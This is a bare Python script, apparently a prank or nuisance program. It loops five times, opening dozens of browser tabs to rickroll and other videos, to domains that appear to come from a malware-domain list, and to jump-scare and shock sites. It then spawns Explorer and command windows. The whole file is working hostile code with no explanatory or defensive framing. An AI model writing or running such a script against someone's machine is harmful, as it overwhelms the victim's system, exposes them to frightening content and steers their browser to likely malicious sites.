import os
import webbrowser
import sys
import subprocess

for i in range(5):
    webbrowser.open_new("https://www.youtube.com/watch?v=p2hSH2XYqRM")
    webbrowser.open_new('https://www.youtube.com/watch?v=dQw4w9WgXcQ')
    webbrowser.open_new('https://www.youtube.com/watch?v=-IKW7g0SH48')
    webbrowser.open_new('https://www.youtube.com/watch?v=ReJ6yiUtq5k')
    webbrowser.open_new('https://www.youtube.com/watch?v=ee925OTFBCA')
    webbrowser.open_new('https://www.youtube.com/watch?v=FO3tpxxdzko')
    webbrowser.open_new('https://www.youtube.com/watch?v=IpTSAlQMunY')
    webbrowser.open_new('https://www.youtube.com/watch?v=niUyz5TQShU')
    webbrowser.open_new('https://www.youtube.com/watch?v=BTs5FS66IUI')
    webbrowser.open_new('https://www.youtube.com/watch?v=2-vA5yLWBHg')
    webbrowser.open_new('17ebook.com')
    webbrowser.open_new('aladel.net')
    webbrowser.open_new('bpwhamburgorchardpark.org')
    webbrowser.open_new('bpwhamburgorchardpark.org')
    webbrowser.open_new('dfwdiesel.net')    
    webbrowser.open_new('divineenterprises.net')
    webbrowser.open_new('fantasticfilms.ru')
    webbrowser.open_new('gardensrestaurantandcatering.com')
    webbrowser.open_new('ginedis.com')
    webbrowser.open_new('gncr.org')
    webbrowser.open_new('hdvideoforums.org')
    webbrowser.open_new('hihanin.com')
    webbrowser.open_new('kingfamilyphotoalbum.com')
    webbrowser.open_new('likaraoke.com')
    webbrowser.open_new('mactep.org')
    webbrowser.open_new('magic4you.nu')
    webbrowser.open_new('marbling.pe.kr')
    webbrowser.open_new('nacjalneg.info')
    webbrowser.open_new('pronline.ru')
    webbrowser.open_new('purplehoodie.com')
    webbrowser.open_new('qsng.cn')
    webbrowser.open_new('seksburada.net')
    webbrowser.open_new('sportsmansclub.net')
    webbrowser.open_new('stock888.cn')
    webbrowser.open_new('tathli.com')
    webbrowser.open_new('teamclouds.com')
    webbrowser.open_new('texaswhitetailfever.com')
    webbrowser.open_new('wadefamilytree.org')
    webbrowser.open_new('xnescat.info')
    webbrowser.open_new('yt118.com')
    webbrowser.open_new('http://www.planecrashinfo.com/lastwords.htm')
    webbrowser.open_new('http://deathdate.info/s/death')
    webbrowser.open_new('http://www.staggeringbeauty.com/')
    webbrowser.open_new('http://comic.naver.com/webtoon/detail.nhn?titleId=350217&no=31&weekday=tue/')
    webbrowser.open_new('http://divine-interventions.com/')
    webbrowser.open_new('http://scary-mazegame.net/scary-maze-game-original/')
    webbrowser.open_new('http://www.creepypasta.com/')
    webbrowser.open_new('https://webkay.robinlinus.com/')
    webbrowser.open_new('http://sentimentalcorp.org/')
    webbrowser.open_new('http://www.angelfire.com/empire/serpentis666/HOME.html')
    os.system('explorer')
    os.system('start')
